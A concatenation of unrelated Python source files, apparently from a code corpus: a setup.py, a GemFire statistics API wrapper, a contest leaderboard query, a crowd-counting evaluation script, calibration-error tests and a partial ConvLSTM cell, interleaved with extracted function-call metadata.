(['infer_graph'], {'name': '""""""'}), "(infer_graph, name='')\n", (4403, 4425), True, 'import tensorflow as tf\n'), ((5459, 5470), 'time.time', 'time.time', ([], {}), '()\n', (5468, 5470), False, 'import time\n'), ((6710, 6740), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['inputs_file'], {}), '(inputs_file)\n', (6727, 6740), True, 'import tensorflow as tf\n'), ((2206, 2219), 'six.unichr', 'six.unichr', (['x'], {}), '(x)\n', (2216, 2219), False, 'import six\n'), ((4114, 4124), 'tensorflow.Graph', 'tf.Graph', ([], 
{}), '()\n', (4122, 4124), True, 'import tensorflow as tf\n'), ((5566, 5577), 'time.time', 'time.time', ([], {}), '()\n', (5575, 5577), False, 'import time\n'), ((5745, 5773), 'numpy.array', 'np.array', (['time_list[warmup:]'], {}), '(time_list[warmup:])\n', (5753, 5773), True, 'import numpy as np\n'), ((2295, 2308), 'six.unichr', 'six.unichr', (['x'], {}), '(x)\n', (2305, 2308), False, 'import six\n'), ((3819, 3838), 'pandas.DataFrame', 'pd.DataFrame', (['batch'], {}), '(batch)\n', (3831, 3838), True, 'import pandas as pd\n'), ((6981, 7014), 'tensorflow.io.gfile.GFile', 'tf.io.gfile.GFile', (['reference_file'], {}), '(reference_file)\n', (6998, 7014), True, 'import tensorflow as tf\n')]
|
from distutils.core import setup
setup(
name = 'Esse3Api',
packages = ['Esse3Api'],
version = '1.1',
license = 'MIT',
description = 'A python library to query and interact with Cineca\'s ESSE3 REST API',
author = '<NAME>',
author_email = '<EMAIL>',
url = 'https://github.com/LorenzoLeonardini/Esse3Api',
download_url = 'https://github.com/LorenzoLeonardini/Esse3Api/archive/v1.1.tar.gz',
keywords = ['CINECA', 'ESSE3', 'UNIVERSITY'],
install_requires = [
'requests',
],
classifiers = [
'Development Status :: 3 - Alpha', # Chose either "3 - Alpha", "4 - Beta" or "5 - Production/Stable" as the current state of your package
'Intended Audience :: Developers', # Define that your audience are developers
'Topic :: Software Development :: Build Tools',
'License :: OSI Approved :: MIT License',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.4',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: 3.6',
],
)
|
[
"distutils.core.setup"
] |
[((33, 838), 'distutils.core.setup', 'setup', ([], {'name': '"""Esse3Api"""', 'packages': "['Esse3Api']", 'version': '"""1.1"""', 'license': '"""MIT"""', 'description': '"""A python library to query and interact with Cineca\'s ESSE3 REST API"""', 'author': '"""<NAME>"""', 'author_email': '"""<EMAIL>"""', 'url': '"""https://github.com/LorenzoLeonardini/Esse3Api"""', 'download_url': '"""https://github.com/LorenzoLeonardini/Esse3Api/archive/v1.1.tar.gz"""', 'keywords': "['CINECA', 'ESSE3', 'UNIVERSITY']", 'install_requires': "['requests']", 'classifiers': "['Development Status :: 3 - Alpha', 'Intended Audience :: Developers',\n 'Topic :: Software Development :: Build Tools',\n 'License :: OSI Approved :: MIT License',\n 'Programming Language :: Python :: 3',\n 'Programming Language :: Python :: 3.4',\n 'Programming Language :: Python :: 3.5',\n 'Programming Language :: Python :: 3.6']"}), '(name=\'Esse3Api\', packages=[\'Esse3Api\'], version=\'1.1\', license=\'MIT\',\n description=\n "A python library to query and interact with Cineca\'s ESSE3 REST API",\n author=\'<NAME>\', author_email=\'<EMAIL>\', url=\n \'https://github.com/LorenzoLeonardini/Esse3Api\', download_url=\n \'https://github.com/LorenzoLeonardini/Esse3Api/archive/v1.1.tar.gz\',\n keywords=[\'CINECA\', \'ESSE3\', \'UNIVERSITY\'], install_requires=[\n \'requests\'], classifiers=[\'Development Status :: 3 - Alpha\',\n \'Intended Audience :: Developers\',\n \'Topic :: Software Development :: Build Tools\',\n \'License :: OSI Approved :: MIT License\',\n \'Programming Language :: Python :: 3\',\n \'Programming Language :: Python :: 3.4\',\n \'Programming Language :: Python :: 3.5\',\n \'Programming Language :: Python :: 3.6\'])\n', (38, 838), False, 'from distutils.core import setup\n')]
|
# vFabric Administration Server API
# Copyright (c) 2012 VMware, Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from datetime import datetime
from vas.shared.Deletable import Deletable
from vas.shared.MutableCollection import MutableCollection
from vas.shared.Resource import Resource
from vas.util.LinkUtils import LinkUtils
class Statistics(MutableCollection):
"""Used to enumerate and delete a cache server's statistics
:ivar `vas.shared.Security.Security` security: The resource's security
"""
def __init__(self, client, location):
super(Statistics, self).__init__(client, location, 'statistics', Statistic)
class Statistic(Resource, Deletable):
"""A statistic of a cache server
:ivar str content: The statistic's content
:ivar `vas.gemfire.CacheServerNodeInstances.CacheServerNodeInstance` instance: The statistic's cache server
node instance
:ivar `datetime.datetime` last_modified: The last modified stamp of
the statistic
:ivar str path: the path of the statistic
:ivar `vas.shared.Security.Security` security: The resource's security
:ivar int size: The size of the statistic
"""
__instance = None
@property
def content(self):
return self._client.get(self.__content_location)
@property
def instance(self):
self.__instance = self.__instance or CacheServerNodeInstance(self._client, self.__instance_location)
return self.__instance
@property
def last_modified(self):
return self.__last_modified
@property
def path(self):
return self.__path
@property
def size(self):
return self.__size
def __init__(self, client, location):
super(Statistic, self).__init__(client, location)
self.__path = self._details['path']
self.__instance_location = LinkUtils.get_link_href(self._details, 'cache-server-node-instance')
self.__content_location = LinkUtils.get_link_href(self._details, 'content')
def reload(self):
super(Statistic, self).reload()
self.__last_modified = datetime.utcfromtimestamp(self._details['last-modified'])
self.__size = self._details['size']
def __str__(self):
return "<{} path={} size={} last_modified={}>".format(self.__class__.__name__, self.__path, self.__size,
self.__last_modified)
from vas.gemfire.CacheServerNodeInstances import CacheServerNodeInstance
|
[
"datetime.datetime.utcfromtimestamp",
"vas.gemfire.CacheServerNodeInstances.CacheServerNodeInstance",
"vas.util.LinkUtils.LinkUtils.get_link_href"
] |
[((2861, 2929), 'vas.util.LinkUtils.LinkUtils.get_link_href', 'LinkUtils.get_link_href', (['self._details', '"""cache-server-node-instance"""'], {}), "(self._details, 'cache-server-node-instance')\n", (2884, 2929), False, 'from vas.util.LinkUtils import LinkUtils\n'), ((2964, 3013), 'vas.util.LinkUtils.LinkUtils.get_link_href', 'LinkUtils.get_link_href', (['self._details', '"""content"""'], {}), "(self._details, 'content')\n", (2987, 3013), False, 'from vas.util.LinkUtils import LinkUtils\n'), ((3109, 3166), 'datetime.datetime.utcfromtimestamp', 'datetime.utcfromtimestamp', (["self._details['last-modified']"], {}), "(self._details['last-modified'])\n", (3134, 3166), False, 'from datetime import datetime\n'), ((2380, 2443), 'vas.gemfire.CacheServerNodeInstances.CacheServerNodeInstance', 'CacheServerNodeInstance', (['self._client', 'self.__instance_location'], {}), '(self._client, self.__instance_location)\n', (2403, 2443), False, 'from vas.gemfire.CacheServerNodeInstances import CacheServerNodeInstance\n')]
|
# from app.main.models.ChallengesModel import ChallengesModel
from ..models.AttemptsModel import AttemptsModel
from ..models.ContestsChallengesModel import contests_challenges
from ..models.UsersModel import UserModel
from app.main import db
import uuid
import json
def get_raw_data(contest_id):
data_raw = db.engine.execute("select total.user_id, total.total, total.contest_id, u.name, u.email, c.contest_name from (select sum(max_score) as total, user_id, contest_id from attempts where contest_id = %s group by user_id) as total join users as u on u.id = total.user_id join contests as c on c.id = total.contest_id;"%(contest_id))
print(data_raw)
names = []
#names = [dict(row) for row in data_raw]
for row in data_raw:
temp_dict = {}
temp_dict['contest_id'] = row['contest_id']
temp_dict['user_id'] = row['user_id']
temp_dict['total'] = int(row['total'])
temp_dict['name'] = row['name']
temp_dict['email'] = row['email']
temp_dict['contest_name'] = row['contest_name']
names.append(temp_dict)
names = sorted(names, key = lambda i: i['total'])
names.reverse()
    # guard against contests with no attempts; names[0] would otherwise raise IndexError
    if not names:
        return {"leaderboard": [], "comment": "success"}
    temp_score = names[0]['total']
rank = 1
count = 0
for i in names:
count = count + 1
if i['total'] == temp_score:
i['rank'] = rank
else:
temp_score = i['total']
i['rank'] = count
rank = count
resp = {"leaderboard": names,"comment":"success"}
return resp
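# Worked example of the competition-style ranking above (comments only):
#   sorted totals [10, 10, 7, 7, 5]  ->  ranks [1, 1, 3, 3, 5]
# tied users share the best rank, and the next distinct score takes its
# 1-based position in the list, so rank numbers may be skipped after a tie.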
|
[
"app.main.db.engine.execute"
] |
[((315, 651), 'app.main.db.engine.execute', 'db.engine.execute', (["('select total.user_id, total.total, total.contest_id, u.name, u.email, c.contest_name from (select sum(max_score) as total, user_id, contest_id from attempts where contest_id = %s group by user_id) as total join users as u on u.id = total.user_id join contests as c on c.id = total.contest_id;'\n % contest_id)"], {}), "(\n 'select total.user_id, total.total, total.contest_id, u.name, u.email, c.contest_name from (select sum(max_score) as total, user_id, contest_id from attempts where contest_id = %s group by user_id) as total join users as u on u.id = total.user_id join contests as c on c.id = total.contest_id;'\n % contest_id)\n", (332, 651), False, 'from app.main import db\n')]
|
import argparse
import torch
import os
import numpy as np
import datasets.crowd as crowd
from models import vgg19
def run():
torch.multiprocessing.freeze_support()
parser = argparse.ArgumentParser(description='Test ')
parser.add_argument('--device', default='0', help='assign device')
parser.add_argument('--crop-size', type=int, default=512,
help='the crop size of the train image')
parser.add_argument('--model-path', type=str, default='',
help='saved model path')
parser.add_argument('--data-path', type=str,
default='data/ShanghaiTech/part_A/',
                        help='path to the dataset root directory')
parser.add_argument('--dataset', type=str, default='sha',
help='dataset name: sha, shb')
parser.add_argument('--pred-density-map-path', type=str, default='',
help='save predicted density maps when pred-density-map-path is not empty.')
args = parser.parse_args()
os.environ['CUDA_VISIBLE_DEVICES'] = args.device # set vis gpu
device = torch.device('cuda')
model_path = args.model_path
crop_size = args.crop_size
data_path = args.data_path
if args.dataset.lower() == 'sha' or args.dataset.lower() == 'shb':
dataset = crowd.Crowd_sh(os.path.join(data_path, 'test_data'), crop_size, 8, method='val')
else:
raise NotImplementedError
dataloader = torch.utils.data.DataLoader(dataset, 1, shuffle=False,
num_workers=1, pin_memory=True)
if args.pred_density_map_path:
import cv2
if not os.path.exists(args.pred_density_map_path):
os.makedirs(args.pred_density_map_path)
model = vgg19()
model.to(device)
model.load_state_dict(torch.load(model_path, device))
model.eval()
image_errs = []
print(dataloader)
for inputs, count, name in dataloader:
inputs = inputs.to(device)
assert inputs.size(0) == 1, 'the batch size should equal to 1'
with torch.set_grad_enabled(False):
outputs, _ = model(inputs)
img_err = count[0].item() - torch.sum(outputs).item()
image_errs.append(img_err)
if args.pred_density_map_path:
vis_img = outputs[0, 0].cpu().numpy()
# normalize density map values from 0 to 1, then map it to 0-255.
vis_img = (vis_img - vis_img.min()) / (vis_img.max() - vis_img.min() + 1e-5)
vis_img = (vis_img * 255).astype(np.uint8)
vis_img = cv2.applyColorMap(vis_img, cv2.COLORMAP_JET)
cv2.imwrite(os.path.join(args.pred_density_map_path, str(name[0]) + '.png'), vis_img)
image_errs = np.array(image_errs)
mse = np.sqrt(np.mean(np.square(image_errs)))
mae = np.mean(np.abs(image_errs))
print('{}: mae {}, mse {}\n'.format(model_path, mae, mse))
if __name__ == '__main__':
run()
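# Example invocation (the script name and file paths are placeholders; the
# flags are the ones defined in run() above):
#   python test.py --device 0 --dataset sha \
#       --data-path data/ShanghaiTech/part_A/ \
#       --model-path checkpoints/best_model.pth \
#       --pred-density-map-path vis_out/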
|
[
"numpy.abs",
"argparse.ArgumentParser",
"torch.utils.data.DataLoader",
"os.makedirs",
"torch.sum",
"torch.load",
"torch.set_grad_enabled",
"os.path.exists",
"numpy.square",
"models.vgg19",
"torch.multiprocessing.freeze_support",
"numpy.array",
"cv2.applyColorMap",
"torch.device",
"os.path.join"
] |
[((130, 168), 'torch.multiprocessing.freeze_support', 'torch.multiprocessing.freeze_support', ([], {}), '()\n', (166, 168), False, 'import torch\n'), ((183, 227), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {'description': '"""Test """'}), "(description='Test ')\n", (206, 227), False, 'import argparse\n'), ((1102, 1122), 'torch.device', 'torch.device', (['"""cuda"""'], {}), "('cuda')\n", (1114, 1122), False, 'import torch\n'), ((1451, 1541), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset', '(1)'], {'shuffle': '(False)', 'num_workers': '(1)', 'pin_memory': '(True)'}), '(dataset, 1, shuffle=False, num_workers=1,\n pin_memory=True)\n', (1478, 1541), False, 'import torch\n'), ((1762, 1769), 'models.vgg19', 'vgg19', ([], {}), '()\n', (1767, 1769), False, 'from models import vgg19\n'), ((2733, 2753), 'numpy.array', 'np.array', (['image_errs'], {}), '(image_errs)\n', (2741, 2753), True, 'import numpy as np\n'), ((1817, 1847), 'torch.load', 'torch.load', (['model_path', 'device'], {}), '(model_path, device)\n', (1827, 1847), False, 'import torch\n'), ((2822, 2840), 'numpy.abs', 'np.abs', (['image_errs'], {}), '(image_errs)\n', (2828, 2840), True, 'import numpy as np\n'), ((1324, 1360), 'os.path.join', 'os.path.join', (['data_path', '"""test_data"""'], {}), "(data_path, 'test_data')\n", (1336, 1360), False, 'import os\n'), ((1653, 1695), 'os.path.exists', 'os.path.exists', (['args.pred_density_map_path'], {}), '(args.pred_density_map_path)\n', (1667, 1695), False, 'import os\n'), ((1709, 1748), 'os.makedirs', 'os.makedirs', (['args.pred_density_map_path'], {}), '(args.pred_density_map_path)\n', (1720, 1748), False, 'import os\n'), ((2070, 2099), 'torch.set_grad_enabled', 'torch.set_grad_enabled', (['(False)'], {}), '(False)\n', (2092, 2099), False, 'import torch\n'), ((2572, 2616), 'cv2.applyColorMap', 'cv2.applyColorMap', (['vis_img', 'cv2.COLORMAP_JET'], {}), '(vis_img, cv2.COLORMAP_JET)\n', (2589, 2616), False, 'import cv2\n'), ((2780, 2801), 'numpy.square', 'np.square', (['image_errs'], {}), '(image_errs)\n', (2789, 2801), True, 'import numpy as np\n'), ((2176, 2194), 'torch.sum', 'torch.sum', (['outputs'], {}), '(outputs)\n', (2185, 2194), False, 'import torch\n')]
|
# coding=utf-8
# Copyright 2020 The uncertainty_metrics Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Lint as: python3
"""Tests for calibration metrics."""
import numpy as np
import tensorflow.compat.v2 as tf
import uncertainty_metrics as um
class ExpectedCalibrationErrorTest(tf.test.TestCase):
def testBinaryClassification(self):
num_bins = 10
pred_probs = np.array([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])
# max_pred_probs: [0.51, 0.55, 0.61, 0.66, 0.68, 0.71, 0.81, 0.85]
# pred_class: [1, 0, 0, 1, 1, 0, 1, 1]
labels = np.array([0., 0., 0., 1., 0., 1., 1., 1.])
n = len(pred_probs)
# Bins for the max predicted probabilities are (0, 0.1), [0.1, 0.2), ...,
# [0.9, 1) and are numbered starting at zero.
bin_counts = np.array([0, 0, 0, 0, 0, 2, 3, 1, 2, 0])
bin_correct_sums = np.array([0, 0, 0, 0, 0, 1, 2, 0, 2, 0])
bin_prob_sums = np.array([0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68,
0.71, 0.81 + 0.85, 0])
correct_ece = 0.
bin_accs = np.array([0.] * num_bins)
bin_confs = np.array([0.] * num_bins)
for i in range(num_bins):
if bin_counts[i] > 0:
bin_accs[i] = bin_correct_sums[i] / bin_counts[i]
bin_confs[i] = bin_prob_sums[i] / bin_counts[i]
correct_ece += bin_counts[i] / n * abs(bin_accs[i] - bin_confs[i])
metric = um.ExpectedCalibrationError(
num_bins, name='ECE', dtype=tf.float64)
self.assertEqual(len(metric.variables), 3)
ece1 = metric(labels, pred_probs)
self.assertAllClose(ece1, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
# Test various types of input shapes.
metric.reset_states()
metric.update_state(labels[:2], pred_probs[:2])
metric.update_state(labels[2:6].reshape(2, 2),
pred_probs[2:6].reshape(2, 2))
metric.update_state(labels[6:7], pred_probs[6:7])
ece2 = metric(labels[7:, np.newaxis], pred_probs[7:, np.newaxis])
ece3 = metric.result()
self.assertAllClose(ece2, ece3)
self.assertAllClose(ece3, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
def testBinaryClassificationKerasModel(self):
num_bins = 10
pred_probs = np.array([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])
# max_pred_probs: [0.51, 0.55, 0.61, 0.66, 0.68, 0.71, 0.81, 0.85]
# pred_class: [1, 0, 0, 1, 1, 0, 1, 1]
labels = np.array([0., 0., 0., 1., 0., 1., 1., 1.])
n = len(pred_probs)
# Bins for the max predicted probabilities are (0, 0.1), [0.1, 0.2), ...,
# [0.9, 1) and are numbered starting at zero.
bin_counts = [0, 0, 0, 0, 0, 2, 3, 1, 2, 0]
bin_correct_sums = [0, 0, 0, 0, 0, 1, 2, 0, 2, 0]
bin_prob_sums = [0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68, 0.71,
0.81 + 0.85, 0]
correct_ece = 0.
bin_accs = [0.] * num_bins
bin_confs = [0.] * num_bins
for i in range(num_bins):
if bin_counts[i] > 0:
bin_accs[i] = bin_correct_sums[i] / bin_counts[i]
bin_confs[i] = bin_prob_sums[i] / bin_counts[i]
correct_ece += bin_counts[i] / n * abs(bin_accs[i] - bin_confs[i])
metric = um.ExpectedCalibrationError(num_bins, name='ECE')
self.assertEqual(len(metric.variables), 3)
model = tf.keras.models.Sequential([tf.keras.layers.Lambda(lambda x: 1*x)])
model.compile(loss='binary_crossentropy', optimizer='sgd', metrics=[metric])
outputs = model.predict(pred_probs)
self.assertAllClose(pred_probs.reshape([n, 1]), outputs)
_, ece = model.evaluate(pred_probs, labels)
self.assertAllClose(ece, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
def testMulticlassClassification(self):
num_bins = 10
pred_probs = [
[0.31, 0.32, 0.27],
[0.37, 0.33, 0.30],
[0.30, 0.31, 0.39],
[0.61, 0.38, 0.01],
[0.10, 0.65, 0.25],
[0.91, 0.05, 0.04],
]
# max_pred_probs: [0.32, 0.37, 0.39, 0.61, 0.65, 0.91]
# pred_class: [1, 0, 2, 0, 1, 0]
labels = [1., 0, 0., 1., 0., 0.]
n = len(pred_probs)
# Bins for the max predicted probabilities are (0, 0.1), [0.1, 0.2), ...,
# [0.9, 1) and are numbered starting at zero.
bin_counts = [0, 0, 0, 3, 0, 0, 2, 0, 0, 1]
bin_correct_sums = [0, 0, 0, 2, 0, 0, 0, 0, 0, 1]
bin_prob_sums = [0, 0, 0, 0.32 + 0.37 + 0.39, 0, 0, 0.61 + 0.65, 0, 0, 0.91]
correct_ece = 0.
bin_accs = [0.] * num_bins
bin_confs = [0.] * num_bins
for i in range(num_bins):
if bin_counts[i] > 0:
bin_accs[i] = bin_correct_sums[i] / bin_counts[i]
bin_confs[i] = bin_prob_sums[i] / bin_counts[i]
correct_ece += bin_counts[i] / n * abs(bin_accs[i] - bin_confs[i])
metric = um.ExpectedCalibrationError(
num_bins, name='ECE', dtype=tf.float64)
self.assertEqual(len(metric.variables), 3)
metric.update_state(labels[:4], pred_probs[:4])
ece1 = metric(labels[4:], pred_probs[4:])
ece2 = metric.result()
self.assertAllClose(ece1, ece2)
self.assertAllClose(ece2, correct_ece)
actual_bin_counts = tf.convert_to_tensor(metric.counts)
actual_bin_correct_sums = tf.convert_to_tensor(metric.correct_sums)
actual_bin_prob_sums = tf.convert_to_tensor(metric.prob_sums)
self.assertAllEqual(bin_counts, actual_bin_counts)
self.assertAllEqual(bin_correct_sums, actual_bin_correct_sums)
self.assertAllClose(bin_prob_sums, actual_bin_prob_sums)
if __name__ == '__main__':
tf.enable_v2_behavior()
tf.test.main()
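# Hand-check of the binary-classification ECE tested above, derived from the
# constants in testBinaryClassification (comments only):
#   bin [0.5, 0.6): n=2, acc=1/2, conf=(0.51+0.55)/2=0.530      -> (2/8)*|0.500-0.530|  = 0.0075
#   bin [0.6, 0.7): n=3, acc=2/3, conf=(0.61+0.66+0.68)/3=0.650 -> (3/8)*|0.667-0.650| ~= 0.0063
#   bin [0.7, 0.8): n=1, acc=0,   conf=0.710                    -> (1/8)*0.710          = 0.0888
#   bin [0.8, 0.9): n=2, acc=1,   conf=(0.81+0.85)/2=0.830      -> (2/8)*|1-0.830|      = 0.0425
#   correct_ece ~= 0.0075 + 0.0063 + 0.0888 + 0.0425 ~= 0.145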
|
[
"tensorflow.compat.v2.keras.layers.Lambda",
"tensorflow.compat.v2.test.main",
"tensorflow.compat.v2.enable_v2_behavior",
"tensorflow.compat.v2.convert_to_tensor",
"numpy.array",
"uncertainty_metrics.ExpectedCalibrationError"
] |
[((6981, 7004), 'tensorflow.compat.v2.enable_v2_behavior', 'tf.enable_v2_behavior', ([], {}), '()\n', (7002, 7004), True, 'import tensorflow.compat.v2 as tf\n'), ((7007, 7021), 'tensorflow.compat.v2.test.main', 'tf.test.main', ([], {}), '()\n', (7019, 7021), True, 'import tensorflow.compat.v2 as tf\n'), ((884, 942), 'numpy.array', 'np.array', (['[0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85]'], {}), '([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])\n', (892, 942), True, 'import numpy as np\n'), ((1070, 1120), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0]'], {}), '([0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0])\n', (1078, 1120), True, 'import numpy as np\n'), ((1283, 1323), 'numpy.array', 'np.array', (['[0, 0, 0, 0, 0, 2, 3, 1, 2, 0]'], {}), '([0, 0, 0, 0, 0, 2, 3, 1, 2, 0])\n', (1291, 1323), True, 'import numpy as np\n'), ((1347, 1387), 'numpy.array', 'np.array', (['[0, 0, 0, 0, 0, 1, 2, 0, 2, 0]'], {}), '([0, 0, 0, 0, 0, 1, 2, 0, 2, 0])\n', (1355, 1387), True, 'import numpy as np\n'), ((1408, 1493), 'numpy.array', 'np.array', (['[0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68, 0.71, 0.81 + 0.85, 0]'], {}), '([0, 0, 0, 0, 0, 0.51 + 0.55, 0.61 + 0.66 + 0.68, 0.71, 0.81 + 0.85, 0]\n    )\n', (1416, 1493), True, 'import numpy as np\n'), ((1556, 1582), 'numpy.array', 'np.array', (['([0.0] * num_bins)'], {}), '([0.0] * num_bins)\n', (1564, 1582), True, 'import numpy as np\n'), ((1598, 1624), 'numpy.array', 'np.array', (['([0.0] * num_bins)'], {}), '([0.0] * num_bins)\n', (1606, 1624), True, 'import numpy as np\n'), ((1885, 1952), 'uncertainty_metrics.ExpectedCalibrationError', 'um.ExpectedCalibrationError', (['num_bins'], {'name': '"""ECE"""', 'dtype': 'tf.float64'}), "(num_bins, name='ECE', dtype=tf.float64)\n", (1912, 1952), True, 'import uncertainty_metrics as um\n'), ((2116, 2151), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (2136, 2151), True, 'import tensorflow.compat.v2 as tf\n'), ((2182, 2223), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (2202, 2223), True, 'import tensorflow.compat.v2 as tf\n'), ((2251, 2289), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (2271, 2289), True, 'import tensorflow.compat.v2 as tf\n'), ((2955, 2990), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (2975, 2990), True, 'import tensorflow.compat.v2 as tf\n'), ((3021, 3062), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (3041, 3062), True, 'import tensorflow.compat.v2 as tf\n'), ((3090, 3128), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (3110, 3128), True, 'import tensorflow.compat.v2 as tf\n'), ((3396, 3454), 'numpy.array', 'np.array', (['[0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85]'], {}), '([0.51, 0.45, 0.39, 0.66, 0.68, 0.29, 0.81, 0.85])\n', (3404, 3454), True, 'import numpy as np\n'), ((3582, 3632), 'numpy.array', 'np.array', (['[0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0]'], {}), '([0.0, 0.0, 0.0, 1.0, 0.0, 1.0, 1.0, 1.0])\n', (3590, 3632), True, 'import numpy as np\n'), ((4338, 4387), 'uncertainty_metrics.ExpectedCalibrationError', 'um.ExpectedCalibrationError', (['num_bins'], {'name': '"""ECE"""'}), "(num_bins, name='ECE')\n", (4365, 4387), True, 'import uncertainty_metrics as um\n'), ((4813, 4848), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (4833, 4848), True, 'import tensorflow.compat.v2 as tf\n'), ((4879, 4920), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (4899, 4920), True, 'import tensorflow.compat.v2 as tf\n'), ((4948, 4986), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (4968, 4986), True, 'import tensorflow.compat.v2 as tf\n'), ((6239, 6306), 'uncertainty_metrics.ExpectedCalibrationError', 'um.ExpectedCalibrationError', (['num_bins'], {'name': '"""ECE"""', 'dtype': 'tf.float64'}), "(num_bins, name='ECE', dtype=tf.float64)\n", (6266, 6306), True, 'import uncertainty_metrics as um\n'), ((6593, 6628), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.counts'], {}), '(metric.counts)\n', (6613, 6628), True, 'import tensorflow.compat.v2 as tf\n'), ((6659, 6700), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.correct_sums'], {}), '(metric.correct_sums)\n', (6679, 6700), True, 'import tensorflow.compat.v2 as tf\n'), ((6728, 6766), 'tensorflow.compat.v2.convert_to_tensor', 'tf.convert_to_tensor', (['metric.prob_sums'], {}), '(metric.prob_sums)\n', (6748, 6766), True, 'import tensorflow.compat.v2 as tf\n'), ((4476, 4515), 'tensorflow.compat.v2.keras.layers.Lambda', 'tf.keras.layers.Lambda', (['(lambda x: 1 * x)'], {}), '(lambda x: 1 * x)\n', (4498, 4515), True, 'import tensorflow.compat.v2 as tf\n')]
|
"""
Convolutional LSTM cell implementation from https://github.com/loliverhennigh
"""
import logging
import tensorflow as tf
from tensorflow.contrib.rnn import LSTMStateTuple  # state tuple type used when state_is_tuple=True
class BasicConvLSTMCell(object):
"""Basic Conv LSTM recurrent network cell.
"""
def __init__(self, shape, filter_size, num_features, forget_bias=1.0,
input_size=None, state_is_tuple=False, activation=tf.nn.tanh):
"""Initialize the basic Conv LSTM cell.
Args:
shape: int tuple thats the height and width of the cell
filter_size: int tuple thats the height and width of the filter
num_features: int thats the depth of the cell
forget_bias: float, The bias added to forget gates (see above).
input_size: Deprecated and unused.
state_is_tuple: If True, accepted and returned states are 2-tuples of
the `c_state` and `m_state`. If False, they are concatenated
along the column axis. The latter behavior will soon be deprecated.
activation: Activation function of the inner states.
"""
if input_size is not None:
logging.warn("%s: The input_size parameter is deprecated.", self)
self.shape = shape
self.filter_size = filter_size
self.num_features = num_features
self._forget_bias = forget_bias
self._state_is_tuple = state_is_tuple
self._activation = activation
@property
def state_size(self):
return (LSTMStateTuple(self._num_units, self._num_units)
if self._state_is_tuple else 2 * self._num_units)
@property
def output_size(self):
return self._num_units
def __call__(self, inputs, state, scope=None, reuse=False):
"""Long short-term memory cell (LSTM)."""
# "BasicLSTMCell"
with tf.variable_scope(scope or type(self).__name__, reuse=reuse):
# Parameters of gates are concatenated into one multiply for efficiency.
if self._state_is_tuple:
c, h = state
else:
c, h = tf.split(axis=3, num_or_size_splits=2, value=state)
concat = _conv_linear([inputs, h], self.filter_size,
self.num_features * 4, True)
